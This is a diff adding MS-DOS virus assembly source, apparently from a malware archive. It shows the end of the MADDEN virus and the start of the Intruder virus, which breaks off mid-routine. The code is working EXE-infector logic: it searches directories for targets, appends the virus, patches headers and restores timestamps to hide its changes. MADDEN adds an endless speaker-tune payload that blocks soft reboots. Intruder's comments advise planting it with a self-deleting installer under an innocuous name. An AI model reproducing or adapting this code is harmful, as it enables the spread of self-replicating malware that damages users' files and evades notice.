4831,0006, 4063,0006, 3043,0006, + dw 4304,0006, 4063,0006, 4304,0006, 4063,0006, + dw 3043,0006, 4831,0006, 4063,0006, 3043,0006, + dw 4304,0006, 4063,0006, 4304,0006, 4063,0006, + dw 3043,0006, 5119,0006, 5423,0006, 3043,0006, + dw 6087,0020, + + dw 6087,0006, + dw 7239,0006, 3619,0006, 4831,0006, 6087,0006 + dw 7670,0006, 7239,0006, 4831,0006, 3619,0006 + + dw 6087,0006, 4063,0006, 3043,0006, 5119,0006 + dw 4831,0006, 6087,0006, 7239,0006, 8126,0006 + dw 6087,0020, + + dw 4304,0006, 4063,0006, 4304,0006, 4063,0006, + dw 3043,0006, 4831,0006, 4063,0006, 3043,0006, + dw 4304,0006, 4063,0006, 4304,0006, 4063,0006, + dw 3043,0006, 4831,0006, 4063,0006, 3043,0006, + dw 4304,0006, 4063,0006, 4304,0006, 4063,0006, + dw 3043,0006, 5119,0006, 5423,0006, 3043,0006, + dw 6087,0020, + + dw 6087,0006, + dw 7239,0006, 3619,0006, 4831,0006, 6087,0006 + dw 7670,0006, 7239,0006, 4831,0006, 3619,0006 + + dw 6087,0006, 4063,0006, 3043,0006, 5119,0006 + dw 4831,0006, 6087,0006, 7239,0006, 8126,0006 + dw 6087,0020, + + dw 7670,0006, 7239,0006, 4831,0006, 3619,0006 + dw 3043,0006, 3619,0006, 4831,0006, 6087,0006 + dw 3043,0010, + + dw 4304,0006, 4063,0006, 4304,0006, 4063,0006, + dw 3043,0006, 4831,0006, 4063,0006, 3043,0006, + dw 4304,0006, 4063,0006, 4304,0006, 4063,0006, + dw 3043,0006, 4831,0006, 4063,0006, 3043,0006, + dw 4304,0006, 4063,0006, 4304,0006, 4063,0006, + dw 3043,0006, 5119,0006, 5423,0006, 3043,0006, + dw 6087,0020, + + dw 7670,0006, 7239,0006, 4831,0006, 3619,0006 + dw 3043,0006, 3619,0006, 4831,0006, 6087,0006 + dw 3043,0010, + + dw 6087,0006, + dw 7239,0006, 3619,0006, 4831,0006, 6087,0006 + dw 7670,0006, 7239,0006, 4831,0006, 3619,0006 + + dw 6087,0006, 4063,0006, 3043,0006, 5119,0006 + dw 4831,0006, 6087,0006, 7239,0006, 8126,0006 + dw 6087,0020, + + dw 0ffffh +;-------------------------------------------------------------------------- +;MADDEN virus main routine starts here +VIRUS: + push ax ;save startup info in ax + mov ax,cs + mov ds,ax ;set up DS=CS for the virus + mov ax,es ;get PSP Seg + mov WORD PTR [OLDDTA+2],ax ;set up default DTA Seg=PSP Seg in case of abort without getting it + call SHOULDRUN ;run only when certain conditions met signalled by z set + jnz REL1 ;conditions aren't met, go execute host program + call SETSR ;modify SHOULDRUN procedure to activate conditions + call NEW_DTA ;set up a new DTA location + call FIND_FILE ;get an exe file to attack + jnz TOON ;returned nz - no valid files left, play maddening toon! + call SAVE_ATTRIBUTE ;save the file attributes and leave file opened in r/w mode + call INFECT ;move program code to file we found to attack + call REST_ATTRIBUTE ;restore the original file attributes and close the file +FINISH: call RESTORE_DTA ;restore the DTA to its original value at startup + pop ax ;restore startup value of ax +REL1: ;relocatable marker for host stack segment + mov bx,HSTACK ;set up host program stack segment (ax=segment) + cli ;interrupts off while changing stack + mov ss,bx +REL1A: ;marker for host stack pointer + mov sp,OFFSET HSTACK + mov es,WORD PTR [OLDDTA+2] ;set up ES correctly + mov ds,WORD PTR [OLDDTA+2] ;and DS + sti ;interrupts back on +REL2: ;relocatable marker for host code segment + jmp FAR PTR HOST ;begin execution of host program + +;-------------------------------------------------------------------------- +;First Level - Find a file which passes FILE_OK +; +;This routine does a complex directory search to find an EXE file in the +;current directory, one of its subdirectories, or the root directory or one +;of its subdirectories, to find a file for which FILE_OK returns with C reset. +;If you want to change the depth of the search, make sure to allocate enough +;room at DTA2. This variable needs to have 2BH * LEVEL bytes in it to work, +;since the recursive FINDBR uses a different DTA area for the search (see DOS +;functions 4EH and 4FH) on each level. +; +FIND_FILE: + mov al,'\' ;set up current directory path in USEFILE + mov BYTE PTR [USEFILE],al + mov si,OFFSET USEFILE+1 + xor dl,dl + mov ah,47H + int 21H ;get current dir, USEFILE= \dir + cmp BYTE PTR [USEFILE+1],0 ;see if it is null. If so, its the root + jnz FF2 ;not the root + xor al,al ;make correction for root directory, + mov BYTE PTR [USEFILE],al ;by setting USEFILE = '' +FF2: mov al,2 + mov [LEVEL],al ;search 2 subdirs deep + call FINDBR ;attempt to locate a valid file + jz FF3 ;found one - exit + xor al,al ;nope - try the root directory + mov BYTE PTR [USEFILE],al ;by setting USEFILE= '' + inc al ;al=1 + mov [LEVEL],al ;search one subdir deep + call FINDBR ;attempt to find file +FF3: + ret ;exit with z flag set by FINDBR to indicate success/failure + +;*************************************************************************** +; This routine enables MADDEN virus to compell the pc to play a +;'maddening' toon when it can't find a file to infect +;************************************************************************** +TOON: + cli ;interrupts off + mov al,10110110xb ;the magic number + out 43h,al ;send it + lea si,MUZIK ;point (si) to our note table +TOON2: cld ;must increment forward + lodsw ;load word into ax and increment (si) + cmp ax,0ffffh ;is it ffff - if so end of table + jz GO_MUZIK2 ;so, time to jump into endless loop + out 42h,al ;send LSB first + mov al,ah ;place MSB in al + out 42h,al ;send it next + in al,61h ;get value to turn on speaker + or al,00000011xb ;OR the gotten value + out 61h,al ;now we turn on speaker + lodsw ;load the repeat loop count into (ax) +LOOP6: mov cx,8000 ;delay count +LOOP7: loop LOOP7 ;do the delay + dec ax ;decrement repeat count + jnz loop6 ;if not = 0 loop back + in al,61h ;all done + and al,11111100xb ;number turns speaker off + out 61h,al ;send it + jmp short TOON2 ;now go do next note +GO_MUZIK2: ;our loop point + sti ;enable interrupts + jmp TOON ;jump back to beginning - this code + ; has the additional advantage of + ;locking out CTRL-ALT-DEL reboot. + ;The user must do a hard reset to recover. +;-------------------------------------------------------------------------- +;SEARCH FUNCTION +;--------------------------------------------------------------------------- +;Second Level - Find in a branch +; +;This function searches the directory specified in USEFILE for EXE files. +;after searching the specified directory, it searches subdirectories to the +;depth LEVEL. If an EXE file is found for which FILE_OK returns with C reset, this +;routine exits with Z set and leaves the file and path in USEFILE +; +FINDBR: + call FINDEXE ;search current dir for EXE first + jnc FBE3 ;found it - exit + cmp [LEVEL],0 ;no - do we want to go another directory deeper? + jz FBE1 ;no - exit + dec [LEVEL] ;yes - decrement LEVEL and continue + mov di,OFFSET USEFILE ;'\curr_dir' is here + mov si,OFFSET ALLFILE ;'\*.*' is here + call CONCAT ;get '\curr_dir\*.*' in USEFILE + inc di + push di ;store pointer to first * + call FIRSTDIR ;get first subdirectory + jnz FBE ;couldn't find it, so quit +FB1: ;otherwise, check it out + pop di ;strip \*.* off of USEFILE + xor al,al + stosb + mov di,OFFSET USEFILE + mov bx,OFFSET DTA2+1EH + mov al,[LEVEL] + mov dl,2BH ;compute correct DTA location for subdir name + mul dl ;which depends on the depth we're at in the search + add bx,ax ;bx points to directory name + mov si,bx + call CONCAT ;'\curr_dir\sub_dir' put in USEFILE + push di ;save position of first letter in sub_dir name + call FINDBR ;scan the subdirectory and its subdirectories (recursive) + jz FBE2 ;if successful, exit + call NEXTDIR ;get next subdirectory in this directory + jz FB1 ;go check it if search successful +FBE: ;else exit, NZ set, cleaned up + inc [LEVEL] ;increment the level counter before exit + pop di ;strip any path or file spec off of original + xor al,al ;directory path + stosb +FBE1: mov al,1 ;return with NZ set + or al,al + ret + +FBE2: pop di ;successful exit, pull this off the stack +FBE3: xor al,al ;and set Z + ret ;exit + +;-------------------------------------------------------------------------- +;Third Level - Part A - Find an EXE file +; +;This function searches the path in USEFILE for an EXE file which passes +;the test FILE_OK. This routine will return the full path of the EXE file +;in USEFILE, and the c flag reset, if it is successful. Otherwise, it will return +;with the c flag set. It will search a whole directory before giving up. +; +FINDEXE: + mov dx,OFFSET DTA1 ;set new DTA for EXE search + mov ah,1AH + int 21H + mov di,OFFSET USEFILE + mov si,OFFSET EXEFILE + call CONCAT ;set up USEFILE with '\dir\*.EXE' + push di ;save position of '\' before '*.EXE' + mov dx,OFFSET USEFILE + mov cx,3FH ;search first for any file + mov ah,4EH + int 21H +NEXTEXE: + or al,al ;is DOS return OK? + jnz FEC ;no - quit with C set + pop di + inc di + stosb ;truncate '\dir\*.EXE' to '\dir\' + mov di,OFFSET USEFILE + mov si,OFFSET DTA1+1EH + call CONCAT ;setup file name '\dir\filename.exe' + dec di + push di + call FILE_OK ;yes - is this a good file to use? + jnc FENC ;yes - valid file found - exit with c reset + mov ah,4FH + int 21H ;do find next + jmp SHORT NEXTEXE ;and go test it for validity + +FEC: ;no valid file found, return with C set + pop di + mov BYTE PTR [di],0 ;truncate \dir\filename.exe to \dir + stc + ret +FENC: ;valid file found, return with NC + pop di + ret + + +;-------------------------------------------------------------------------- +;Third Level - Part B - Find a subdirectory +; +;This function searches the file path in USEFILE for subdirectories, excluding +;the subdirectory header entries. If one is found, it returns with Z set, and +;if not, it returns with NZ set. +;There are two entry points here, FIRSTDIR, which does the search first, and +;NEXTDIR, which does the search next. +; +FIRSTDIR: + call GET_DTA ;get proper DTA address in dx (calculated from LEVEL) + push dx ;save it + mov ah,1AH ;set DTA + int 21H + mov dx,OFFSET USEFILE + mov cx,10H ;search for a directory + mov ah,4EH ;do search first function + int 21H +NEXTD1: + pop bx ;get pointer to search table (DTA) + or al,al ;successful search? + jnz NEXTD3 ;no, quit with NZ set + test BYTE PTR [bx+15H],10H ;is this a directory? + jz NEXTDIR ;no, find another + cmp BYTE PTR [bx+1EH],'.' ;is it a subdirectory header? + jne NEXTD2 ;no - valid directory, exit, setting Z flag + ;else it was dir header entry, so fall through to next +NEXTDIR: ;second entry point for search next + call GET_DTA ;get proper DTA address again - may not be set up + push dx + mov ah,1AH ;set DTA + int 21H + mov ah,4FH + int 21H ;do find next + jmp SHORT NEXTD1 ;and loop to check the validity of the return + +NEXTD2: + xor al,al ;successful exit, set Z flag +NEXTD3: + ret ;exit routine + +;-------------------------------------------------------------------------- +;Return the DTA address associated to LEVEL in dx. This is simply given by +;OFFSET DTA2 + (LEVEL*2BH). Each level must have a different search record +;in its own DTA, since a search at a lower level occurs in the middle of the +;higher level search, and we don't want the higher level being ruined by +;corrupted data. +; +GET_DTA: + mov dx,OFFSET DTA2 + mov al,2BH + mul [LEVEL] + add dx,ax ;return with dx= proper dta offset + ret + +;-------------------------------------------------------------------------- +;Concatenate two strings: Add the asciiz string at DS:SI to the asciiz +;string at ES:DI. Return ES:DI pointing to the end of the first string in the +;destination (or the first character of the second string, after moved). +; +CONCAT: + mov al,byte ptr es:[di] ;find the end of string 1 + inc di + or al,al + jnz CONCAT + dec di ;di points to the null at the end + push di ;save it to return to the caller +CONCAT2: + cld + lodsb ;move second string to end of first + stosb + or al,al + jnz CONCAT2 + pop di ;and restore di to point to end of string 1 + ret + + +;-------------------------------------------------------------------------- +;Function to determine whether the EXE file specified in USEFILE is useable. +;if so return nc, else return c +;What makes an EXE file useable?: +; a) The signature field in the EXE header must be 'MZ'. (These +; are the first two bytes in the file.) +; b) The Overlay Number field in the EXE header must be zero. +; c) There must be room in the relocatable table for NUMRELS +; more relocatables without enlarging it. +; d) The word VIRUSID must not appear in the 2 bytes just before +; the initial CS:0000 of the test file. If it does, the virus +; is probably already in that file, so we skip it. +; +FILE_OK: + call GET_EXE_HEADER ;read the EXE header in USEFILE into EXE_HDR + jc OK_END ;error in reading the file, so quit + call CHECK_SIG_OVERLAY ;is the overlay number zero? + jc OK_END ;no - exit with c set + call REL_ROOM ;is there room in the relocatable table? + jc OK_END ;no - exit + call IS_ID_THERE ;is id at CS:0000? +OK_END: ret ;return with c flag set properly + +;-------------------------------------------------------------------------- +;Returns c if signature in the EXE header is anything but 'MZ' or the overlay +;number is anything but zero. +CHECK_SIG_OVERLAY: + mov al,'M' ;check the signature first + mov ah,'Z' + cmp ax,WORD PTR [EXE_HDR] + jz CSO_1 ;jump if OK + stc ;else set carry and exit + ret +CSO_1: xor ax,ax + sub ax,WORD PTR [EXE_HDR+26];subtract the overlay number from 0 + ret ;c is set if it's anything but 0 + +;-------------------------------------------------------------------------- +;This function reads the 28 byte EXE file header for the file named in USEFILE. +;It puts the header in EXE_HDR, and returns c set if unsuccessful. +; +GET_EXE_HEADER: + mov dx,OFFSET USEFILE + mov ax,3D02H ;r/w access open file + int 21H + jc RE_RET ;error opening - C set - quit without closing + mov [HANDLE],ax ;else save file handle + mov bx,ax ;handle to bx + mov cx,1CH ;read 28 byte EXE file header + mov dx,OFFSET EXE_HDR ;into this buffer + mov ah,3FH + int 21H +RE_RET: ret ;return with c set properly + +;-------------------------------------------------------------------------- +;This function determines if there are at least NUMRELS openings in the +;current relocatable table in USEFILE. If there are, it returns with +;carry reset, otherwise it returns with carry set. The computation +;this routine does is to compare whether +; ((Header Size * 4) + Number of Relocatables) * 4 - Start of Rel Table +;is >= than 4 * NUMRELS. If it is, then there is enough room +; +REL_ROOM: + mov ax,WORD PTR [EXE_HDR+8] ;size of header, paragraphs + add ax,ax + add ax,ax + sub ax,WORD PTR [EXE_HDR+6] ;number of relocatables + add ax,ax + add ax,ax + sub ax,WORD PTR [EXE_HDR+24] ;start of relocatable table + cmp ax,4*NUMRELS ;enough room to put relocatables in? +RR_RET: ret ;exit with carry set properly + + +;-------------------------------------------------------------------------- +;This function determines whether the word at the initial CS:0000 in USEFILE +;is the same as VIRUSID in this program. If it is, it returns c set, otherwise +;it returns c reset. +; +IS_ID_THERE: + mov ax,WORD PTR [EXE_HDR+22] ;Initial CS + add ax,WORD PTR [EXE_HDR+8] ;Header size + mov dx,16 + mul dx + mov cx,dx + mov dx,ax ;cxdx = position to look for VIRUSID in file + mov bx,[HANDLE] + mov ax,4200H ;set file pointer, relative to beginning + int 21H + mov ah,3FH + mov bx,[HANDLE] + mov dx,OFFSET VIDC + mov cx,2 ;read 2 bytes into VIDC + int 21H + jc II_RET ;couldn't read - bad file - report as though ID is there so we dont do any more to this file + mov ax,[VIDC] + cmp ax,[VIRUSID] ;is it the VIRUSID? + clc + jnz II_RET ;if not, then virus is not already in this file + stc ;else it is probably there already +II_RET: ret + + +;-------------------------------------------------------------------------- +;This routine makes sure file end is at paragraph boundary, so the virus +;can be attached with a valid CS. Assumes file pointer is at end of file. +SETBDY: + mov al,BYTE PTR [FSIZE] + and al,0FH ;see if we have a paragraph boundary (header is always even # of paragraphs) + jz SB_E ;all set - exit + mov cx,10H ;no - write any old bytes to even it up + sub cl,al ;number of bytes to write in cx + mov dx,OFFSET FINAL ;set buffer up to point to end of the code (just garbage there) + add WORD PTR [FSIZE],cx ;update FSIZE + adc WORD PTR [FSIZE+2],0 + mov bx,[HANDLE] + mov ah,40H ;DOS write function + int 21H +SB_E: ret + +;-------------------------------------------------------------------------- +;This routine moves the virus (this program) to the end of the EXE file +;Basically, it just copies everything here to there, and then goes and +;adjusts the EXE file header and two relocatables in the program, so that +;it will work in the new environment. It also makes sure the virus starts +;on a paragraph boundary, and adds how many bytes are necessary to do that. +; +INFECT: + mov cx,WORD PTR [FSIZE+2] + mov dx,WORD PTR [FSIZE] + mov bx,[HANDLE] + mov ax,4200H ;set file pointer, relative to beginning + int 21H ;go to end of file + call SETBDY ;lengthen to a paragraph boundary if necessary + mov cx,OFFSET FINAL ;last byte of code + xor dx,dx ;first byte of code, DS:DX + mov bx,[HANDLE] ;move virus code to end of file being attacked with + mov ah,40H ;DOS write function + int 21H + mov dx,WORD PTR [FSIZE] ;find 1st relocatable in code (SS) + mov cx,WORD PTR [FSIZE+2] + mov bx,OFFSET REL1 ;it is at FSIZE+REL1+1 in the file + inc bx + add dx,bx + mov bx,0 + adc cx,bx ;cx:dx is that number + mov bx,[HANDLE] + mov ax,4200H ;set file pointer to 1st relocatable + int 21H + mov dx,OFFSET EXE_HDR+14 ;get correct old SS for new program + mov bx,[HANDLE] ;from the EXE header + mov cx,2 + mov ah,40H ;and write it to relocatable REL1+1 + int 21H + mov dx,WORD PTR [FSIZE] + mov cx,WORD PTR [FSIZE+2] + mov bx,OFFSET REL1A ;put in correct old SP from EXE header + inc bx ;at FSIZE+REL1A+1 + add dx,bx + mov bx,0 + adc cx,bx ;cx:dx points to FSIZE+REL1A+1 + mov bx,[HANDLE] + mov ax,4200H ;set file pointer to place to write SP to + int 21H + mov dx,OFFSET EXE_HDR+16 ;get correct old SP for infected program + mov bx,[HANDLE] ;from EXE header + mov cx,2 + mov ah,40H ;and write it where it belongs + int 21H + mov dx,WORD PTR [FSIZE] + mov cx,WORD PTR [FSIZE+2] + mov bx,OFFSET REL2 ;put in correct old CS:IP in program + add bx,1 ;at FSIZE+REL2+1 on disk + add dx,bx + mov bx,0 + adc cx,bx ;cx:dx points to FSIZE+REL2+1 + mov bx,[HANDLE] + mov ax,4200H ;set file pointer relavtive to start of file + int 21H + mov dx,OFFSET EXE_HDR+20 ;get correct old CS:IP from EXE header + mov bx,[HANDLE] + mov cx,4 + mov ah,40H ;and write 4 bytes to FSIZE+REL2+1 + int 21H + ;done writing relocatable vectors + ;so now adjust the EXE header values + xor cx,cx + xor dx,dx + mov bx,[HANDLE] + mov ax,4200H ;set file pointer to start of file + int 21H + mov ax,WORD PTR [FSIZE] ;calculate new initial CS (the virus' CS) + mov cl,4 ;given by (FSIZE/16)-HEADER SIZE (in paragraphs) + shr ax,cl + mov bx,WORD PTR [FSIZE+2] + and bl,0FH + mov cl,4 + shl bl,cl + add ah,bl + sub ax,WORD PTR [EXE_HDR+8] ;(exe header size, in paragraphs) + mov WORD PTR [EXE_HDR+22],ax;and save as initial CS + mov bx,OFFSET FINAL ;compute new initial SS + add bx,10H ;using the formula SSi=(CSi + (OFFSET FINAL+16)/16) + mov cl,4 + shr bx,cl + add ax,bx + mov WORD PTR [EXE_HDR+14],ax ;and save it + mov ax,OFFSET VIRUS ;get initial IP + mov WORD PTR [EXE_HDR+20],ax ;and save it + mov ax,STACKSIZE ;get initial SP + mov WORD PTR [EXE_HDR+16],ax ;and save it + mov dx,WORD PTR [FSIZE+2] + mov ax,WORD PTR [FSIZE] ;calculate new file size + mov bx,OFFSET FINAL + add ax,bx + xor bx,bx + adc dx,bx ;put it in ax:dx + add ax,200H ;and set up the new page count + adc dx,bx ;page ct= (ax:dx+512)/512 + push ax + mov cl,9 + shr ax,cl + mov cl,7 + shl dx,cl + add ax,dx + mov WORD PTR [EXE_HDR+4],ax ;and save it here + pop ax + and ax,1FFH ;now calculate last page size + mov WORD PTR [EXE_HDR+2],ax ;and put it here + mov ax,NUMRELS ;adjust relocatables counter + add WORD PTR [EXE_HDR+6],ax + mov cx,1CH ;and save data at start of file + mov dx,OFFSET EXE_HDR + mov bx,[HANDLE] + mov ah,40H ;DOS write function + int 21H + mov ax,WORD PTR [EXE_HDR+6] ;get number of relocatables in table + dec ax ;in order to calculate location of + dec ax ;where to add relocatables + mov bx,4 ;Location= (No in table-2)*4+Table Offset + mul bx + add ax,WORD PTR [EXE_HDR+24];table offset + mov bx,0 + adc dx,bx ;dx:ax=end of old table in file + mov cx,dx + mov dx,ax + mov bx,[HANDLE] + mov ax,4200H ;set file pointer to table end + int 21H + mov ax,WORD PTR [EXE_HDR+22] ;and set up 2 pointers: init CS = seg of REL1 + mov bx,OFFSET REL1 + inc bx ;offset of REL1 + mov WORD PTR [EXE_HDR],bx ;use EXE_HDR as a buffer to + mov WORD PTR [EXE_HDR+2],ax ;save relocatables in for now + mov ax,WORD PTR [EXE_HDR+22] ;init CS = seg of REL2 + mov bx,OFFSET REL2 + add bx,3 ;offset of REL2 + mov WORD PTR [EXE_HDR+4],bx ;write it to buffer + mov WORD PTR [EXE_HDR+6],ax + mov cx,8 ;and then write 8 bytes of data in file + mov dx,OFFSET EXE_HDR + mov bx,[HANDLE] + mov ah,40H ;DOS write function + int 21H + ret ;that's it, infection is complete! + +;-------------------------------------------------------------------------- +;This routine determines whether the reproduction code should be executed. +;If it returns Z, the reproduction code is executed, otherwise it is not. +;Currently, it only executes if the system time variable is a multiple of +;TIMECT. As such, the virus will reproduce only 1 out of every TIMECT+1 +;executions of the program. TIMECT should be 2^n-1 +;Note that the ret at SR1 is replaced by a NOP by SETSR whenever the program +;is run. This makes SHOULDRUN return Z for sure the first time, so it +;definitely runs when this loader program is run, but after that, the time must +;be an even multiple of TIMECT+1. +; +TIMECT EQU 0 ;Determines how often to reproduce (1/64 here) +; +SHOULDRUN: + xor ah,ah ;zero ax to start, set z flag +SR1: ret ;this gets replaced by NOP when program runs + int 1AH + and dl,TIMECT ;is it an even multiple of TIMECT+1 ticks? + ret ;return with z flag set if it is, else nz set + + +;-------------------------------------------------------------------------- +;SETSR modifies SHOULDRUN so that the full procedure gets run +;it is redundant after the initial load +SETSR: + mov al,90H ;NOP code + mov BYTE PTR SR1,al ;put it in place of RET above + ret ;and return + +;-------------------------------------------------------------------------- +;This routine sets up the new DTA location at DTA1, and saves the location of +;the initial DTA in the variable OLDDTA. +NEW_DTA: + mov ah,2FH ;get current DTA in ES:BX + int 21H + mov WORD PTR [OLDDTA],bx ;save it here + mov ax,es + mov WORD PTR [OLDDTA+2],ax + mov ax,cs + mov es,ax ;set up ES + mov dx,OFFSET DTA1 ;set new DTA offset + mov ah,1AH + int 21H ;and tell DOS where we want it + ret + +;-------------------------------------------------------------------------- +;This routine reverses the action of NEW_DTA and restores the DTA to its +;original value. +RESTORE_DTA: + mov dx,WORD PTR [OLDDTA] ;get original DTA seg:ofs + mov ax,WORD PTR [OLDDTA+2] + mov ds,ax + mov ah,1AH + int 21H ;and tell DOS where to put it + mov ax,cs ;restore ds before exiting + mov ds,ax + ret + +;-------------------------------------------------------------------------- +;This routine saves the original file attribute in FATTR, the file date and +;time in FDATE and FTIME, and the file size in FSIZE. It also sets the +;file attribute to read/write, and leaves the file opened in read/write +;mode (since it has to open the file to get the date and size), with the handle +;it was opened under in HANDLE. The file path and name is in USEFILE. +SAVE_ATTRIBUTE: + mov ah,43H ;get file attr + mov al,0 + mov dx,OFFSET USEFILE + int 21H + mov [FATTR],cl ;save it here + mov ah,43H ;now set file attr to r/w + mov al,1 + mov dx,OFFSET USEFILE + mov cl,0 + int 21H + mov dx,OFFSET USEFILE + mov al,2 ;now that we know it's r/w + mov ah,3DH ;we can r/w access open file + int 21H + mov [HANDLE],ax ;save file handle here + mov ah,57H ;and get the file date and time + xor al,al + mov bx,[HANDLE] + int 21H + mov [FTIME],cx ;and save it here + mov [FDATE],dx ;and here + mov ax,WORD PTR [DTA1+28] ;file size was set up here by + mov WORD PTR [FSIZE+2],ax ;search routine + mov ax,WORD PTR [DTA1+26] ;so move it to FSIZE + mov WORD PTR [FSIZE],ax + ret + +;-------------------------------------------------------------------------- +;Restore file attribute, and date and time of the file as they were before +;it was infected. This also closes the file +REST_ATTRIBUTE: + mov dx,[FDATE] ;get old date and time + mov cx,[FTIME] + mov ah,57H ;set file date and time to old value + mov al,1 + mov bx,[HANDLE] + int 21H + mov ah,3EH + mov bx,[HANDLE] ;close file + int 21H + mov cl,[FATTR] + xor ch,ch + mov ah,43H ;Set file attr to old value + mov al,1 + mov dx,OFFSET USEFILE + int 21H + ret + +FINAL: ;last byte of code to be kept in virus + +VSEG ENDS + + +;-------------------------------------------------------------------------- +;Virus stack segment + +VSTACK SEGMENT PARA STACK + db STACKSIZE dup (?) +VSTACK ENDS + + END VIRUS ;Entry point is the virus diff --git a/MSDOS/Virus.MSDOS.Unknown.intruder.asm b/MSDOS/Virus.MSDOS.Unknown.intruder.asm new file mode 100644 index 00000000..1195a0cf --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.intruder.asm @@ -0,0 +1,710 @@ +;The Intruder Virus is an EXE file infector which can jump from directory to +;directory and disk to disk. It attaches itself to the end of a file and +;modifies the EXE file header so that it gets control first, before the host +;program. When it is done doing its job, it passes control to the host program, +;so that the host executes without a hint that the virus is there. + + + .SEQ ;segments must appear in sequential order + ;to simulate conditions in actual active virus + + +;MGROUP GROUP HOSTSEG,HSTACK ;Host stack and code segments grouped together + +;HOSTSEG program code segment. The virus gains control before this routine and +;attaches itself to another EXE file. As such, the host program for this +;installer simply tries to delete itself off of disk and terminates. That is +;worthwhile if you want to infect a system with the virus without getting +;caught. Just execute the program that infects, and it disappears without a +;trace. You might want to name the program something more innocuous, though. + +HOSTSEG SEGMENT BYTE + ASSUME CS:HOSTSEG,SS:HSTACK + +PGMSTR DB 'INTRUDER.EXE',0 + +HOST: + mov ax,cs ;we want DS=CS here + mov ds,ax + mov dx,OFFSET PGMSTR + mov ah,41H + int 21H ;delete this exe file + mov ah,4CH + mov al,0 + int 21H ;terminate normally +HOSTSEG ENDS + + +;Host program stack segment + +HSTACK SEGMENT PARA STACK + db 100H dup (?) ;100 bytes long +HSTACK ENDS + +;------------------------------------------------------------------------ +;This is the virus itself + +STACKSIZE EQU 100H ;size of stack for the virus +NUMRELS EQU 2 ;number of relocatables in the virus, which must go in the relocatable pointer table + +;VGROUP GROUP VSEG,VSTACK ;Virus code and stack segments grouped together + +;Intruder Virus code segment. This gains control first, before the host. As this +;ASM file is layed out, this program will look exactly like a simple program +;that was infected by the virus. + +VSEG SEGMENT PARA + ASSUME CS:VSEG,DS:VSEG,SS:VSTACK + +;data storage area comes before any code +VIRUSID DW 0C8AAH ;identifies virus +OLDDTA DD 0 ;old DTA segment and offset +DTA1 DB 2BH dup (?) ;new disk transfer area +DTA2 DB 56H dup (?) ;dta for directory finds (2 deep) +EXE_HDR DB 1CH dup (?) ;buffer for EXE file header +EXEFILE DB '\*.EXE',0 ;search string for an exe file +ALLFILE DB '\*.*',0 ;search string for any file +USEFILE DB 78 dup (?) ;area to put valid file path +LEVEL DB 0 ;depth to search directories for a file +HANDLE DW 0 ;file handle +FATTR DB 0 ;old file attribute storage area +FTIME DW 0 ;old file time stamp storage area +FDATE DW 0 ;old file date stamp storage area +FSIZE DD 0 ;file size storage area +VIDC DW 0 ;storage area to put VIRUSID from new host .EXE in, to check if virus already there +VCODE DB 1 ;identifies this version + +;-------------------------------------------------------------------------- +;Intruder virus main routine starts here +VIRUS: + push ax ;save startup info in ax + mov ax,cs + mov ds,ax ;set up DS=CS for the virus + mov ax,es ;get PSP Seg + mov WORD PTR [OLDDTA+2],ax ;set up default DTA Seg=PSP Seg in case of abort without getting it + call SHOULDRUN ;run only when certain conditions met signalled by z set + jnz REL1 ;conditions aren't met, go execute host program + call SETSR ;modify SHOULDRUN procedure to activate conditions + call NEW_DTA ;set up a new DTA location + call FIND_FILE ;get an exe file to attack + jnz FINISH ;returned nz - no valid file, exit + call SAVE_ATTRIBUTE ;save the file attributes and leave file opened in r/w mode + call INFECT ;move program code to file we found to attack + call REST_ATTRIBUTE ;restore the original file attributes and close the file +FINISH: call RESTORE_DTA ;restore the DTA to its original value at startup + pop ax ;restore startup value of ax +REL1: ;relocatable marker for host stack segment + mov bx,HSTACK ;set up host program stack segment (ax=segment) + cli ;interrupts off while changing stack + mov ss,bx +REL1A: ;marker for host stack pointer + mov sp,OFFSET HSTACK + mov es,WORD PTR [OLDDTA+2] ;set up ES correctly + mov ds,WORD PTR [OLDDTA+2] ;and DS + sti ;interrupts back on +REL2: ;relocatable marker for host code segment + jmp FAR PTR HOST ;begin execution of host program + +;-------------------------------------------------------------------------- +;First Level - Find a file which passes FILE_OK +; +;This routine does a complex directory search to find an EXE file in the +;current directory, one of its subdirectories, or the root directory or one +;of its subdirectories, to find a file for which FILE_OK returns with C reset. +;If you want to change the depth of the search, make sure to allocate enough +;room at DTA2. This variable needs to have 2BH * LEVEL bytes in it to work, +;since the recursive FINDBR uses a different DTA area for the search (see DOS +;functions 4EH and 4FH) on each level. +; +FIND_FILE: + mov al,'\' ;set up current directory path in USEFILE + mov BYTE PTR [USEFILE],al + mov si,OFFSET USEFILE+1 + xor dl,dl + mov ah,47H + int 21H ;get current dir, USEFILE= \dir + cmp BYTE PTR [USEFILE+1],0 ;see if it is null. If so, its the root + jnz FF2 ;not the root + xor al,al ;make correction for root directory, + mov BYTE PTR [USEFILE],al ;by setting USEFILE = '' +FF2: mov al,2 + mov [LEVEL],al ;search 2 subdirs deep + call FINDBR ;attempt to locate a valid file + jz FF3 ;found one - exit + xor al,al ;nope - try the root directory + mov BYTE PTR [USEFILE],al ;by setting USEFILE= '' + inc al ;al=1 + mov [LEVEL],al ;search one subdir deep + call FINDBR ;attempt to find file +FF3: + ret ;exit with z flag set by FINDBR to indicate success/failure + + +;-------------------------------------------------------------------------- +;Second Level - Find in a branch +; +;This function searches the directory specified in USEFILE for EXE files. +;after searching the specified directory, it searches subdirectories to the +;depth LEVEL. If an EXE file is found for which FILE_OK returns with C reset, this +;routine exits with Z set and leaves the file and path in USEFILE +; +FINDBR: + call FINDEXE ;search current dir for EXE first + jnc FBE3 ;found it - exit + cmp [LEVEL],0 ;no - do we want to go another directory deeper? + jz FBE1 ;no - exit + dec [LEVEL] ;yes - decrement LEVEL and continue + mov di,OFFSET USEFILE ;'\curr_dir' is here + mov si,OFFSET ALLFILE ;'\*.*' is here + call CONCAT ;get '\curr_dir\*.*' in USEFILE + inc di + push di ;store pointer to first * + call FIRSTDIR ;get first subdirectory + jnz FBE ;couldn't find it, so quit +FB1: ;otherwise, check it out + pop di ;strip \*.* off of USEFILE + xor al,al + stosb + mov di,OFFSET USEFILE + mov bx,OFFSET DTA2+1EH + mov al,[LEVEL] + mov dl,2BH ;compute correct DTA location for subdir name + mul dl ;which depends on the depth we're at in the search + add bx,ax ;bx points to directory name + mov si,bx + call CONCAT ;'\curr_dir\sub_dir' put in USEFILE + push di ;save position of first letter in sub_dir name + call FINDBR ;scan the subdirectory and its subdirectories (recursive) + jz FBE2 ;if successful, exit + call NEXTDIR ;get next subdirectory in this directory + jz FB1 ;go check it if search successful +FBE: ;else exit, NZ set, cleaned up 